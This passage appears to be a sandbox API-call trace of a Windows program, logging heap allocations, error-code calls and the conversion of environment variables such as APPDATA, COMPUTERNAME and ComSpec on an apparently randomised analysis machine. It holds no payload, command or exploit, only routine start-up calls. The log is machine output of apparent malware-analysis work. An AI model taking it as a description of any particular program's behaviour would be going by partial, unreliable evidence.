dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿâÄÃïäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0079.217] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0079.218] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0079.218] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f0e70) returned 0x80 [0079.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0079.279] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1f) returned 0x5eeaf8 [0079.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x5eeaf8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e1a00 [0079.315] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e1a00) returned 0x4 [0079.315] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e1a00, Size=0x8) returned 0x5e1a00 [0079.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0079.315] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2b) returned 0x5eb400 [0079.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x5eb400, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.347] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e1a00) returned 0x8 [0079.347] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e1a00, Size=0xc) returned 0x5f1568 [0079.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0079.347] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x37) returned 0x5f1580 [0079.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x5f1580, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0079.347] GetLastError () returned 0x0 [0079.347] SetLastError (dwErrCode=0x0) [0079.347] GetLastError () returned 0x0 [0079.347] SetLastError (dwErrCode=0x0) [0079.347] GetLastError () returned 0x0 [0079.347] SetLastError (dwErrCode=0x0) [0079.347] GetLastError () returned 0x0 [0079.347] SetLastError (dwErrCode=0x0) [0079.347] GetLastError () returned 0x0 [0079.347] SetLastError (dwErrCode=0x0) [0079.347] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1568) returned 0xc [0079.348] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1568, Size=0x10) returned 0x5f1568 [0079.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0079.348] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c) returned 0x5e2508 [0079.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x5e2508, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1568) returned 0x10 [0079.348] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1568, Size=0x14) returned 0x5f15c0 [0079.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0079.348] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x31) returned 0x5f15e0 [0079.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x5f15e0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] GetLastError () returned 0x0 [0079.348] SetLastError (dwErrCode=0x0) [0079.348] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f15c0) returned 0x14 [0079.349] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f15c0, Size=0x18) returned 0x5f15c0 [0079.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0079.349] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5f1620 [0079.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x5f1620, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.349] GetLastError () returned 0x0 [0079.349] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f15c0) returned 0x18 [0079.350] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f15c0, Size=0x1c) returned 0x5f1640 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0079.350] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x24) returned 0x5ead30 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x5ead30, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.350] SetLastError (dwErrCode=0x0) [0079.350] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1640) returned 0x1c [0079.351] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1640, Size=0x20) returned 0x5f1640 [0079.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.351] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x5f15c0 [0079.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x5f15c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0079.351] GetLastError () returned 0x0 [0079.351] SetLastError (dwErrCode=0x0) [0079.351] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.352] GetLastError () returned 0x0 [0079.352] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1640) returned 0x20 [0079.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1640, Size=0x24) returned 0x5f1640 [0079.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xd) returned 0x5e31c0 [0079.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x5e31c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.353] SetLastError (dwErrCode=0x0) [0079.353] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] GetLastError () returned 0x0 [0079.354] SetLastError (dwErrCode=0x0) [0079.354] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1640) returned 0x24 [0079.354] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1640, Size=0x28) returned 0x5f1640 [0079.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0079.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1a) returned 0x5eeb20 [0079.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x5eeb20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.355] SetLastError (dwErrCode=0x0) [0079.355] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1640) returned 0x28 [0079.356] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1640, Size=0x2c) returned 0x5f1640 [0079.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0079.356] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2e) returned 0x5eb438 [0079.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x5eb438, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.356] GetLastError () returned 0x0 [0079.356] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.357] SetLastError (dwErrCode=0x0) [0079.357] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1640) returned 0x2c [0079.358] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1640, Size=0x30) returned 0x5f1640 [0079.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0079.358] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x19) returned 0x5eeb48 [0079.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x5eeb48, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.358] SetLastError (dwErrCode=0x0) [0079.358] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.359] SetLastError (dwErrCode=0x0) [0079.359] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.360] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.360] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.360] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.360] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.360] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.360] GetLastError () returned 0x0 [0079.360] SetLastError (dwErrCode=0x0) [0079.360] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5f1640) returned 0x30 [0079.360] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5f1640, Size=0x34) returned 0x5f1640 [0079.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0079.360] 